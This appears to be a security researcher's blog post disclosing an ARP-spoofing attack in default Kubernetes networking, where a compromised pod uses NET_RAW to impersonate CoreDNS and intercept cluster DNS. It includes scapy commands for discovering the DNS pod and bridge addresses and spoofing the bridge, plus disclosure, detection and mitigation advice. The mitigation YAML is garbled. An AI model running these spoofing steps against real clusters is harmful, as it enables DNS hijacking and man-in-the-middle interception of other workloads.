In this post I’ll describe how an attacker, who manages to run malicious code on a cluster can, with no special permissive permissions, successfully spoof DNS responses to all the applications running on the cluster, and from there execute a MITM (Man In The Middle) on all network traffic of pods.
Before we get into the attack scenario, let’s understand how Kubernetes intra-node networking works.
We can discuss about Kubernetes networking in a whole series of blogs and still not cover everything, so in the following explanations, I’m mostly going to concentrate on the default configurations, just for setting a common ground.
Kubernetes Networking in a Nutshell
Generally speaking, pod-to-pod networking inside the node is available via a bridge that connects all pods. This bridge is called “cbr0”.(1) (Some network plugins will install their own bridge, and give it a different name, but in this blog, we’ll refer to it as “cbr0”.) The cbr0 can also handle ARP (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.
In essence, this is how pods communicate with each other on the same node. It’s also how Docker works, and is the default for Kubernetes.
Adding DNS to the Equation
As you can see in the diagram, there’s a pod named CoreDNS (2) running on the node next to our application pod (3). It acts as the cluster’s DNS server. (In reality, there can be multiple cluster DNS server pods.)
This means that every DNS request on the cluster, will arrive at the CoreDNS pod. The pod will first try and resolve the request from what it knows about the cluster. If the domain matches a service/pods/etc.. it will return the corresponding local cluster IP. If not, the CoreDNS pod will reach out to the “upstream resolver”.
Taken from: kubelet/network/dns/dns.go::GetPodDNS()
// For a pod with DNSClusterFirst policy, the cluster DNS server is
// the only nameserver configured for the pod. The cluster DNS server
// itself will forward queries to other nameservers that is configured
// to use, in case the cluster DNS server cannot resolve the DNS query
// itself.
This is due to how Kubernetes handles local Domain names.
The ClusterFirst DNS policy is a default for pods, it is rare to use a different policy.
Important note: Your application pod can be scheduled on the same node as the CoreDNS/kube-dns pod.
But how does a pod know the IP of the cluster DNS server?
Let’s create a “pod” in the cluster.
By looking at the value of `hosts` in `nsswitch.conf`we figure out the behavior expected when resolving DNS.
hosts: files dns
The pod will first try to read the local hosts files to resolve the address, and only then try resolving it from its configured dns nameserver.
So let’s look at the /etc/resolv.conf to find this nameserver.
nameserver 10.96.0.10
search default.svc.cluster.local svc.cluster.local cluster.local project.internal
options ndots:5
We see that the IP for the cluster DNS server is – 10.96.0.10
What gets assigned as the cluster DNS server inside pods, (the nameserver) is actually the Service IP of the kube-dns service. Kubernetes uses something called a VIP (Virtual IP), whereby iptables rules apply DNAT (Destination Network Address Translation) on outgoing traffic to services. This will change the destination VIP to the corresponding CoreDNS pod IP. Setting those iptables rules is actually the job of the kube-proxy pod, that is deployed on each node.
Taking Over the Cluster DNS Server
Let’s imagine that our Web Application pod from earlier in the post, got infected with malicious code.
Assuming the attacker does not have access to cloud metadata APIs and that the cluster is configured with secure RBAC rules, and that the pod is not mounted to a directory within `/var/log`, the attacker would not be able to “escape” the pod and perform a cluster-wide attack, remaining limited to a local attack on the pod – right?
Or would he?
Network Attacks
When looking at the capabilities granted to pods running with default configurations, we notice something disturbing.
root@pod:/# pscap -a
ppid pid name command capabilities
0 1 root bash chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
It seems that we have a NET_RAW capability.
(from the Linux capabilities main page)
NET_RAW is a default permissive setting in Kubernetes. It’s there to allow ICMP traffic between containers. But in addition to ICMP traffic, this capability grants an application the ability to craft raw packets (like ARP and DNS), so there’s a lot of freedom for an attacker to play with network related attacks.
ARP Spoofing
A very popular attack is ARP (Address Resolution Protocol) spoofing. This type of attack exploits the mechanism of correlating IP addresses with MAC (physical) addresses, to let you fake your identity and say: “Hi, I own this IP address, please forward all packets to me”.
Very cool.
I’ll remind you, that the cbr0 (1) (from the first diagram), uses ARP to correlate the IP addresses of pods and the corresponding Network interface, furthermore, the destination VIP of the DNS request is outside of the pod’s subnet, so the packet will be destined to the pod’s default gateway (cbr0) while getting DNAT’ed. This will make the cbr0 responsible for the resolution of the MAC address for the DNS request.
ARP spoofing the cbr0 bridge
All DNS requests arrive at the cbr0 behind the CoreDNS pod, (after they get DNAT) where they are redirected to the DNS server pod.
Note that DNS requests coming from pods on external nodes will also arrive at this cbr0, since it is the bridge that connects the DNS pod to the cluster’s network.
So in the event an attacker manages to infect an application running next to a DNS pod, he could ARP spoof the cbr0, fooling it into thinking that he is the cluster DNS server, and take complete control of all DNS resolution in the cluster.
The Exploit and Proof of Concept
The exploit is written in scapy. (scapy is a packet crafting framework for python.)
To set up the environment, deploy two pods: an attacker pod and a victim pod.
Here is how you create the pods:
pod/hacker created
pod/victim created
And exec into scapy’s interpreter in the attacker pod
➜ ~ kubectl exec -it hacker scapy
First, we need to get the IP of the real kube-dns pod. Bypassing the VIP and finding the real IP of the pod.
>>> dns_pod_mac = srp1(Ether() / IP(dst=kubedns_vip) / UDP(dport=53) / DNS(rd=1,qd=DNSQR())).src
After sending a DNS request to the service IP, simulating a normal DNS resolution scenario, we get the source MAC address of the response. In theory, we could just get the source IP of the response. However, Kubernetes makes sure that we don’t discover the real IP by using SNAT (Source Network Address Translation) on outgoing traffic from the pod. That makes sense, because the resolver client, like nslookup, will not accept an answer with a different source from what it was contacting.
We can now query everyone in the subnet for their MAC address and compare it with the source MAC address we received earlier. Alternatively, we can use RARP (Reverse Address Resolution Protocol) for this. But using normal ARP queries is more reasonable for most environments.
>>> dns_pod_ip = [a[1][ARP].psrc for a in ans if a[1].src == dns_pod_mac][0]
We now need the MAC address and IP of the cbr0 bridge. We can get that with scapy by trace-routing (pinging an external IP and setting the IP ttl to 1):
>>> cbr0_mac, cbr0_ip = res[Ether].src, res[IP].src
We now send fake ARP replies to the bridge (cbr0), telling it that we own the IP of the DNS Pod:
Note: By setting hwdst to the MAC of the bridge, we make sure to only spoof the bridge. This is a crucial measure, as we want to draw as little attention to ourselves as possible.
We expect our attack to DOS (Denial Of Service) the DNS resolving process, so for example, nslookup from another pod on the cluster should not work.
While the attack is running, let’s exec into the victim pod.
➜ ~ kubectl exec -it victim zsh
We then can try to resolve a domain
➜ victim / nslookup example.com
;; reply from unexpected source: 10.67.16.3#53, expected 10.67.0.10#53
;; reply from unexpected source: 10.67.16.3#53, expected 10.67.0.10#53
;; reply from unexpected source: 10.67.16.3#53, expected 10.67.0.10#53
;; connection timed out; no servers could be reached
It is beyond the scope of this blog to explain the errors we get from nslookup, but essentially, this has to do with the fact that ip_forwarding is enabled by default inside containers as well (this is derived from the host). All we need to do now is run a DNS proxy server inside our malicious pod that forwards all traffic to the real CoreDNS pod, except for specific domains to spoof. Thanks to how DNS works, the resolver client will accept our answers even if a different suspicious answer was received first.
The POC
I’ve prepared a full POC for this exploit, it does the following:
- Automatically discovers all IP/MAC addresses it needs
- Decides whether it can run the attack
- Runs an ARP spoof on the cbr0 bridge
- Serves a DNS proxy, which connects to the real kube-DNS pod, and forward all requests to it.
- Reads a custom host file, to answer with a spoofed DNS response when there’s a match.
The following video shows how an attacker could impersonate a web server and send malicious data by spoofing a domain name.
All the files for this exploit can be found under this Github Repo
Keep this in mind:
- If CoreDNS spins up more than one DNS pod, the results are unstable if you only spoof one.
- This exploit only works if you run on the same node as the DNS pod, although similar operations could be performed to overcome this.
How Can I Protect Myself?
We published new hunters for kube-hunter, our open source pen-testing tool for Kubernetes, which will tell you if you are vulnerable to this exploit. To find out if you are vulnerable, run Kube-hunter as a pod with the `–active` flag. if you get a “Possible ARP Spoof” or “Possible DNS Spoof” findings, you need to perform the suggested mitigation steps.
Typically, using an L3 network plugin that routes L3 network of pods on the same node could prevent this exploit.
We also raised this issue with the Kubernetes project’s security team, and they stated that: “It is unfortunate that the Kubernetes & Docker container default is to allow CAP_NET_RAW, but to maintain backwards compatibility we don’t think we can change this default in the short term. Users should drop unneeded capabilities for their applications through the container SecurityContext or with Pod Security Policies”.
They further expanded that: “Some CNI plugins will prevent ARP spoofing because they will reject any traffic from the pod where the source MAC or source IP address doesn’t match. For example, the OpenShift SDN CNI plugin and the future ovn-kubernetes plugin (in development) send traffic through an OVS bridge which drops traffic not from the configured source addresses for the interface. With those plugins, as long as a pod is not using hostNetwork: true, pods won’t be able to do ARP spoofing”.
Mitigation
The recommended step to avoid such network attacks, is adding a `securityContext` that drops the NET_RAW capability in your application.
For example:
apiVersion: v1 kind: Pod metadata:
– NET_RAW
This shouldn’t affect most applications, since it’s only needed for applications that do deep networking inspection/manipulation. Dropping this capability will make sure that even if your application code got compromised, the attacker could not perform such network-based attacks on your cluster.